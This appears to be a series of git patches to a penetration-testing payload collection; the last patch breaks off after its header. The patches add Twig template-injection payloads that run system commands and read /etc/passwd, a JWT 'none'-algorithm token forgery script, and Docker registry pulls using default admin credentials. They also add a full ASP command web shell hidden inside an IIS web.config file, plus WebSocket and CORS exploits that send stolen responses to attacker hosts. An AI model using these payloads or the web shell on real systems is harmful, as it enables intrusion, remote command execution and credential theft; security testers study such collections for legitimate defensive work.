+* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)

From 268d85b4bf8ee0553691f035ca11f06aea8f4fda Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 29 Mar 2020 22:34:26 +0200
Subject: [PATCH 09/85] Symfony SSTI Twig RCE

---
 Server Side Template Injection/README.md | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 79c2a9f..0f780ee 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -17,6 +17,7 @@
 * [Twig](#twig)
   * [Basic injection](#basic-injection)
   * [Template format](#template-format)
+  * [Arbitrary File Reading](#arbitrary-file-reading)
   * [Code execution](#code-execution)
 * [Smarty](#smarty)
 * [Freemarker](#freemarker)
@@ -126,6 +127,8 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
 ```python
 {{7*7}}
 {{7*'7'}} would result in 49
+{{dump(app)}}
+{{app.request.server.all|join(',')}}
 ```
 
 ### Template format
@@ -142,6 +145,12 @@ $output = $twig > render (
 );
 ```
 
+### Arbitrary File Reading
+
+```python
+"{{'/etc/passwd'|file_excerpt(1,30)}}"@
+```
+
 ### Code execution
 
 ```python
@@ -150,6 +159,13 @@ $output = $twig > render (
 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
 ```
 
+Example with an email passing FILTER_VALIDATE_EMAIL PHP.
+
+```powershell
+POST /subscribe?0=cat+/etc/passwd HTTP/1.1
+email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
+```
+
 ## Smarty
 
 ```python

From 8b78c2fe71e7eebe7548f20eb2348c1151a870e1 Mon Sep 17 00:00:00 2001
From: SakiiR SakiiR <sakiirlessons@gmail.com>
Date: Sun, 29 Mar 2020 23:19:27 +0200
Subject: [PATCH 10/85] Added filter(system) twig RCE

---
 Server Side Template Injection/README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 0f780ee..9bf3241 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -157,6 +157,8 @@ $output = $twig > render (
 {{self}}
 {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
+{{['id']|filter('system')}}
+{{['cat\x20/etc/passwd']|filter('system')}}
 ```
 
 Example with an email passing FILTER_VALIDATE_EMAIL PHP.

From 38c273ff00da234058b477275826323af3429a58 Mon Sep 17 00:00:00 2001
From: SakiiR SakiiR <sakiirlessons@gmail.com>
Date: Sun, 29 Mar 2020 23:23:26 +0200
Subject: [PATCH 11/85] Added IFS (WAF bypass) to Symfony Twig RCE

---
 Server Side Template Injection/README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 9bf3241..9fc9ac5 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -159,6 +159,7 @@ $output = $twig > render (
 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
 {{['id']|filter('system')}}
 {{['cat\x20/etc/passwd']|filter('system')}}
+{{['cat$IFS/etc/passwd']|filter('system')}}
 ```
 
 Example with an email passing FILTER_VALIDATE_EMAIL PHP.

From 009a2f92768e1f2c0c6bc5c4da8f5044b04f0bb7 Mon Sep 17 00:00:00 2001
From: "fuxsocy.py" <0x0byte@protonmail.com>
Date: Fri, 3 Apr 2020 23:15:05 +0000
Subject: [PATCH 12/85] Update SQLite Injection.md

Added new link location for the pdf.
---
 SQL Injection/SQLite Injection.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md
index 428e806..dcece85 100644
--- a/SQL Injection/SQLite Injection.md	
+++ b/SQL Injection/SQLite Injection.md	
@@ -88,4 +88,4 @@ Note: By default this component is disabled
 
 ## References
 
-[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)
+[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)

From c9fcb58d57f1097a2351f713413627752f7d88df Mon Sep 17 00:00:00 2001
From: Syed Umar Arfeen <18597330+Anon-Exploiter@users.noreply.github.com>
Date: Sat, 4 Apr 2020 16:03:56 +0500
Subject: [PATCH 13/85] Using JWT's module to encode payload with type `None`

Before the JWT was being encoded/decoded and that was done manually. The JWT's module does all that without manual decoding and splitting.

This PR contains the code to encode the JWT token with type None while using JWT's library in python.
---
 JSON Web Token/README.md | 38 +++++++++++++-------------------------
 1 file changed, 13 insertions(+), 25 deletions(-)

diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md
index a6fb080..c4063d8 100644
--- a/JSON Web Token/README.md	
+++ b/JSON Web Token/README.md	
@@ -100,37 +100,25 @@ To exploit this vulnerability, you just need to decode the JWT and change the al
 
 However, this won't work unless you **remove** the signature
 
-The following code is a basic test for a None algorithm.
-
-```python
-import jwt
-import base64
-
-def b64urlencode(data):
-    return base64.b64encode(data).replace('+', '-').replace('/', '_').replace('=', '')
-
-print b64urlencode("{\"typ\":\"JWT\",\"alg\":\"none\"}") + \
-    '.' + b64urlencode("{\"data\":\"test\"}") + '.'
-```
-
 Alternatively you can modify an existing JWT (be careful with the expiration time)
 
-```python
-#!/usr/bin/python
+```python3
+#!/usr/bin/python3
 # -*- coding: utf-8 -*-
 
-jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ"
-header, payload, signature  = jwt.split('.')
+import jwt
 
-# Replacing the ALGO and the payload username
-header  = header.decode('base64').replace('HS256',"none")
-payload = (payload+"==").decode('base64').replace('test','admin')
+jwtToken 	= 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ'
 
-header  = header.encode('base64').strip().replace("=","")
-payload = payload.encode('base64').strip().replace("=","")
+decodedToken 	= jwt.decode(jwtToken, verify=False)  					# Need to decode the token before encoding with type 'None'
+noneEncoded 	= jwt.encode(decodedToken, key='', algorithm=None)
 
-# 'The algorithm 'none' is not supported'
-print( header+"."+payload+".")
+print(noneEncoded.decode())
+
+"""
+Output:
+eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.
+"""
 ```
 
 ## JWT Signature - RS256 to HS256
@@ -290,4 +278,4 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
 - [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9)
 - [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
 - [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
-- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/)
\ No newline at end of file
+- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/)

From 6e7af5a267bb07e18e06a071a0c8a52c6d210bfa Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 4 Apr 2020 18:27:41 +0200
Subject: [PATCH 14/85] Docker Registry - Pull/Download

---
 .../Container - Docker Pentest.md             | 19 ++++++++++++++++++-
 1 file changed, 18 insertions(+), 1 deletion(-)

diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md
index c4682cf..26ca5d9 100644
--- a/Methodology and Resources/Container - Docker Pentest.md	
+++ b/Methodology and Resources/Container - Docker Pentest.md	
@@ -70,6 +70,24 @@ Docker Registry’s fingerprint is `Docker-Distribution-Api-Version` header. The
 ```powershell
 curl https://registry.example.com/v2/<image_name>/tags/list
 docker pull https://registry.example.com:443/<image_name>:<tag>
+
+# connect to the endpoint and list image blobs
+curl -s -k --user "admin:admin" https://docker.registry.local/v2/_catalog
+curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/tags/list
+curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/manifests/latest
+# download blobs
+curl -s -k --user 'admin:admin' 'http://docker.registry.local/v2/wordpress-image/blobs/sha256:c314c5effb61c9e9c534c81a6970590ef4697b8439ec6bb4ab277833f7315058' > out.tar.gz
+# automated download
+https://github.com/NotSoSecure/docker_fetch/
+python /opt/docker_fetch/docker_image_fetch.py -u http://admin:admin@docker.registry.local
+```
+
+Access a private registry and start a container with one of its image
+
+```powershell
+docker login -u admin -p admin docker.registry.local
+docker pull docker.registry.local/wordpress-image
+docker run -it docker.registry.local/wordpress-image /bin/bash
 ```
 
 Access a private registry using OAuth Token from Google
@@ -80,7 +98,6 @@ curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/service
 docker login -e <email> -u oauth2accesstoken -p "<access token>" https://gcr.io
 ```
 
-
 ## Exploit privileged container abusing the Linux cgroup v1
 
 Prerequisite (at least one): 

From cea982c062fede36bdd01dc3a185d39192720462 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 4 Apr 2020 22:33:28 +0200
Subject: [PATCH 15/85] GraphQL Voyager - Represent any GraphQL API as an
 interactive graph

---
 GraphQL Injection/README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md
index 3719113..725bee0 100644
--- a/GraphQL Injection/README.md	
+++ b/GraphQL Injection/README.md	
@@ -22,6 +22,7 @@
 ## Tools
 
 * [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap)
+* [GraphQL-voyager - Represent any GraphQL API as an interactive graph](https://apis.guru/graphql-voyager/)
 * [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/)
 * [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
 * [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)

From 5902da38e4440ba097a9264f5f30327799296c16 Mon Sep 17 00:00:00 2001
From: Techbrunch <Techbrunch@users.noreply.github.com>
Date: Wed, 8 Apr 2020 19:14:30 +0200
Subject: [PATCH 16/85] Create web.web.config

Source: https://gist.github.com/gazcbm/ea7206fbbad83f62080e0bbbeda77d9c
---
 .../web.web.config                            | 65 +++++++++++++++++++
 1 file changed, 65 insertions(+)
 create mode 100644 Upload Insecure Files/Configuration IIS web.config/web.web.config

diff --git a/Upload Insecure Files/Configuration IIS web.config/web.web.config b/Upload Insecure Files/Configuration IIS web.config/web.web.config
new file mode 100644
index 0000000..6e02a37
--- /dev/null
+++ b/Upload Insecure Files/Configuration IIS web.config/web.web.config	
@@ -0,0 +1,65 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<configuration>
+   <system.webServer>
+      <handlers accessPolicy="Read, Script, Write">
+         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
+      </handlers>
+      <security>
+         <requestFiltering>
+            <fileExtensions>
+               <remove fileExtension=".config" />
+            </fileExtensions>
+            <hiddenSegments>
+               <remove segment="web.config" />
+            </hiddenSegments>
+         </requestFiltering>
+      </security>
+   </system.webServer>
+</configuration>
+<!--
+<% Response.write("-"&"->")%>
+<%
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+Function getCommandOutput(theCommand)
+    Dim objShell, objCmdExec
+    Set objShell = CreateObject("WScript.Shell")
+    Set objCmdExec = objshell.exec(thecommand)
+
+    getCommandOutput = objCmdExec.StdOut.ReadAll
+end Function
+%>
+
+<BODY>
+<FORM action="" method="GET">
+<input type="text" name="cmd" size=45 value="<%= szCMD %>">
+<input type="submit" value="Run">
+</FORM>
+
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<%Response.Write(Request.ServerVariables("server_name"))%>
+<p>
+<b>The server's port:</b>
+<%Response.Write(Request.ServerVariables("server_port"))%>
+</p>
+<p>
+<b>The server's software:</b>
+<%Response.Write(Request.ServerVariables("server_software"))%>
+</p>
+<p>
+<b>The server's software:</b>
+<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
+<% szCMD = request("cmd")
+thisDir = getCommandOutput("cmd /c" & szCMD)
+Response.Write(thisDir)%>
+</p>
+<br>
+</BODY>
+
+
+
+<%Response.write("<!-"&"-") %>
+-->

From 930a3a0d8c75c2964ac1d6f74efc319ed6900a2b Mon Sep 17 00:00:00 2001
From: Emanuel Duss <emanuel.duss@gmail.com>
Date: Sat, 11 Apr 2020 16:17:35 +0200
Subject: [PATCH 17/85] Added: Cross-Site WebSocket Hijacking (CSWSH)

---
 Web Sockets/README.md | 29 ++++++++++++++++++++++++++++-
 1 file changed, 28 insertions(+), 1 deletion(-)

diff --git a/Web Sockets/README.md b/Web Sockets/README.md
index b53a7b7..c63bdd4 100644
--- a/Web Sockets/README.md	
+++ b/Web Sockets/README.md	
@@ -31,9 +31,36 @@ Then you can use any tools against the newly created web service, working as a p
 sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
 ```
 
+## Cross-Site WebSocket Hijacking (CSWSH)
+
+If the WebSocket handshake is not correctly protected using a CSRF token or a
+nonce, it's possible to use the authenticated WebSocket of a user on an
+attacker's controlled site because the cookies are automatically sent by the
+browser. This attack is called Cross-Site WebSocket Hijacking (CSWSH).
+
+Example exploit, hosted on an attacker's server, that exfiltrates the received
+data from the WebSocket to the attacker:
+
+```html
+<script>
+  ws = new WebSocket('wss://vulnerable.example.com/messages');
+  ws.onopen = function start(event) {
+    websocket.send("HELLO");
+  }
+  ws.onmessage = function handleReply(event) {
+    fetch('https://attacker.example.net/?'+event.data, {mode: 'no-cors'});
+  }
+  ws.send("Some text sent to the server");
+</script>
+```
+
+You have to adjust the code to your exact situation. E.g. if your web
+application uses a `Sec-WebSocket-Protocol` header in the handshake request,
+you have to add this value as a 2nd parameter to the `WebSocket` function call
+in order to add this header.
 
 ## References
 
 - [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
 - [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
-- [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#)
\ No newline at end of file
+- [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#)

From 4537555714b73de67342aa035f5af44060cb0175 Mon Sep 17 00:00:00 2001
From: Emanuel Duss <emanuel.duss@gmail.com>
Date: Sun, 12 Apr 2020 14:29:10 +0200
Subject: [PATCH 18/85] Added: CORS Misconfiguration with Null Origin allowed

---
 CORS Misconfiguration/README.md | 223 +++++++++++++++++++-------------
 1 file changed, 133 insertions(+), 90 deletions(-)

diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md
index dcf5bfc..98f3573 100644
--- a/CORS Misconfiguration/README.md	
+++ b/CORS Misconfiguration/README.md	
@@ -1,90 +1,133 @@
-# CORS Misconfiguration
-
-> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. 
-
-## Summary
-
-* [Prerequisites](#prerequisites)
-* [Exploitation](#exploitation)
-* [References](#references)
-
-## Prerequisites
-
-* BURP HEADER> `Origin: https://evil.com`
-* VICTIM HEADER> `Access-Control-Allow-Credential: true`
-* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com`
-
-## Exploitation
-
-Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**.
-
-### Vulnerable example 
-
-```powershell
-GET /endpoint HTTP/1.1
-Host: victim.example.com
-Origin: https://evil.com
-Cookie: sessionid=... 
-
-HTTP/1.1 200 OK
-Access-Control-Allow-Origin: https://evil.com
-Access-Control-Allow-Credentials: true 
-
-{"[private API key]"}
-```
-
-### Proof of concept
-
-```js
-var req = new XMLHttpRequest(); 
-req.onload = reqListener; 
-req.open('get','https://victim.example.com/endpoint',true); 
-req.withCredentials = true;
-req.send();
-
-function reqListener() {
-    location='//atttacker.net/log?key='+this.responseText; 
-};
-```
-
-or 
-
-```html
-<html>
-     <body>
-         <h2>CORS PoC</h2>
-         <div id="demo">
-             <button type="button" onclick="cors()">Exploit</button>
-         </div>
-         <script>
-             function cors() {
-             var xhr = new XMLHttpRequest();
-             xhr.onreadystatechange = function() {
-                 if (this.readyState == 4 && this.status == 200) {
-                 document.getElementById("demo").innerHTML = alert(this.responseText);
-                 }
-             };
-              xhr.open("GET",
-                       "https://victim.example.com/endpoint", true);
-             xhr.withCredentials = true;
-             xhr.send();
-             }
-         </script>
-     </body>
- </html>
-```
-
-## Bug Bounty reports
-
-* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
-* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147)
-* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200)
-* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249)
-* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298)
-
-## References
-
-* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
-* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
-* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
-* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
\ No newline at end of file
+# CORS Misconfiguration
+
+> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. 
+
+## Summary
+
+* [Prerequisites](#prerequisites)
+* [Exploitation](#exploitation)
+* [References](#references)
+
+## Prerequisites
+
+* BURP HEADER> `Origin: https://evil.com`
+* VICTIM HEADER> `Access-Control-Allow-Credential: true`
+* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
+
+## Exploitation
+
+Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**.
+
+### Vulnerable Example: Origin Reflection
+
+#### Vulnerable Implementation
+
+```powershell
+GET /endpoint HTTP/1.1
+Host: victim.example.com
+Origin: https://evil.com
+Cookie: sessionid=... 
+
+HTTP/1.1 200 OK
+Access-Control-Allow-Origin: https://evil.com
+Access-Control-Allow-Credentials: true 
+
+{"[private API key]"}
+```
+
+#### Proof of concept
+
+```js
+var req = new XMLHttpRequest(); 
+req.onload = reqListener; 
+req.open('get','https://victim.example.com/endpoint',true); 
+req.withCredentials = true;
+req.send();
+
+function reqListener() {
+    location='//atttacker.net/log?key='+this.responseText; 
+};
+```
+
+or 
+
+```html
+<html>
+     <body>
+         <h2>CORS PoC</h2>
+         <div id="demo">
+             <button type="button" onclick="cors()">Exploit</button>
+         </div>
+         <script>
+             function cors() {
+             var xhr = new XMLHttpRequest();
+             xhr.onreadystatechange = function() {
+                 if (this.readyState == 4 && this.status == 200) {
+                 document.getElementById("demo").innerHTML = alert(this.responseText);
+                 }
+             };
+              xhr.open("GET",
+                       "https://victim.example.com/endpoint", true);
+             xhr.withCredentials = true;
+             xhr.send();
+             }
+         </script>
+     </body>
+ </html>
+```
+
+### Vulnerable Example: Null Origin
+
+#### Vulnerable Implementation
+
+It's possible that the server does not reflect the complete `Origin` header but
+that the `null` origin is allowed. This would look like this in the server's
+response:
+
+```
+GET /endpoint HTTP/1.1
+Host: victim.example.com
+Origin: null
+Cookie: sessionid=... 
+
+HTTP/1.1 200 OK
+Access-Control-Allow-Origin: null
+Access-Control-Allow-Credentials: true 
+
+{"[private API key]"}
+```
+
+#### Proof of concept
+
+This can be exploited by putting the attack code into an iframe using the data
+URI scheme. If the data URI scheme is used, the browser will use the `null`
+origin in the request:
+
+```html
+<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
+  var req = new XMLHttpRequest ();
+  req.onload = reqListener;
+  req.open('get','https://victim.example.com/endpoint',true);
+  req.withCredentials = true;
+  req.send();
+
+  function reqListener() {
+    location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText);
+   };
+</script>"></iframe> 
+```
+
+## Bug Bounty reports
+
+* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
+* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147)
+* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200)
+* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249)
+* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298)
+
+## References
+
+* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
+* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
+* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
+* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)

From 48fcdeb7ca83c147d09734b5ad28bc48d6dd4b2f Mon Sep 17 00:00:00 2001
From: Emanuel Duss <emanuel.duss@gmail.com>
Date: Sun, 12 Apr 2020 14:38:52 +0200
Subject: [PATCH 19/85] Some clarification in the exploit code

---
 CORS Misconfiguration/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md
index 98f3573..d224ea5 100644
--- a/CORS Misconfiguration/README.md	
+++ b/CORS Misconfiguration/README.md	
@@ -112,7 +112,7 @@ origin in the request:
   req.send();
 
   function reqListener() {
-    location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText);
+    location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText);
    };
 </script>"></iframe> 
 ```

From f120024c6b6d768a365cdcc7cf9d4a47f9c9d6b9 Mon Sep 17 00:00:00 2001
From: Emanuel Duss <emanuel.duss@gmail.com>
Date: Sun, 12 Apr 2020 14:55:05 +0200
Subject: [PATCH 20/85] Added CORS exploitation with strict trusted origin
 whitelist using XSS

---
 CORS Misconfiguration/README.md | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md
index d224ea5..d7d9f95 100644
--- a/CORS Misconfiguration/README.md	
+++ b/CORS Misconfiguration/README.md	
@@ -117,6 +117,17 @@ origin in the request:
 </script>"></iframe> 
 ```
 
+### Vulnerable Example: XSS on Trusted Origin
+
+If the application does implement a strict whitelist of allowed origins, the
+exploit codes from above do not work. But if you have an XSS on a trusted
+origin, you can inject the exploit coded from above in order to exploit CORS
+again.
+
+```
+https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
+```
+
 ## Bug Bounty reports
 
 * [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)

From 3e5b36722418cba19b02abd751ab08160dcb43e5 Mon Sep 17 00:00:00 2001
From: Emanuel Duss <emanuel.duss@gmail.com>
Date: Sun, 12 Apr 2020 15:06:28 +0200
Subject: [PATCH 21/85] Added CORS Exploit when wildcard origin  is allowed

---
 CORS Misconfiguration/README.md | 35 +++++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)

diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md
index d7d9f95..8d9af8b 100644
--- a/CORS Misconfiguration/README.md	
+++ b/CORS Misconfiguration/README.md	
@@ -128,6 +128,41 @@ again.
 https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
 ```
 
+### Vulnerable Example: Wildcard Origin `*` without Credentials
+
+If the server responds with a wildcard origin `*`, the browser does never send
+the cookies. Howver, if the server does not require authentication, it's still
+possible to access the data on the server. This can happen on internal servers
+that are not accessible from the Internet. The attacker's website can then
+pivot into the internal network and access the server's data withotu
+authentication.
+
+#### Vulnerable Implementation
+
+```powershell
+GET /endpoint HTTP/1.1
+Host: api.internal.example.com
+Origin: https://evil.com
+
+HTTP/1.1 200 OK
+Access-Control-Allow-Origin: *
+
+{"[private API key]"}
+```
+
+#### Proof of concept
+
+```js
+var req = new XMLHttpRequest(); 
+req.onload = reqListener; 
+req.open('get','https://api.internal.example.com/endpoint',true); 
+req.send();
+
+function reqListener() {
+    location='//atttacker.net/log?key='+this.responseText; 
+};
+```
+
 ## Bug Bounty reports
 
 * [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)

From 54e388707707d12760968b449f0b94cd27865c67 Mon Sep 17 00:00:00 2001
From: Emanuel Duss <emanuel.duss@gmail.com>
Date: Sun, 12 Apr 2020 15:12:34 +0200
Subject: [PATCH 22/85] Added PortSwigger Web Security Academy CORS Link

---
 CORS Misconfiguration/README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md
index 8d9af8b..7d4d715 100644
--- a/CORS Misconfiguration/README.md	
+++ b/CORS Misconfiguration/README.md	
@@ -177,3 +177,4 @@ function reqListener() {
 * [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
 * [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
 * [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
+* [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors)

From 29194a8ef1ecfad7cb461bf4bb9096476e4cfe05 Mon Sep 17 00:00:00 2001
From: Th1b4ud <thibaud.robin.develop@gmail.com>
Date: Mon, 13 Apr 2020 19:06:01 +0200
Subject: [PATCH 23/85] Add others shell on reverse shell cheatsheet

Add others shell on reverse shell cheatsheet
---
 Methodology and Resources/Reverse Shell Cheatsheet.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 9eb5efc..67d626f 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md	
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md	
@@ -54,6 +54,8 @@ Listener:
 nc -u -lvp 4242
 ```
 
+Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash
+
 ### Socat
 
 ```powershell

From cc3b05017dff2055ee3fe187a27437390b1b100a Mon Sep 17 00:00:00 2001
From: chiv <gus@outlook.at>
Date: Mon, 13 Apr 2020 18:44:16 +0100
Subject: [PATCH 24/85] Added a new RCE payload to Jinja2 SSTI bypasses

---
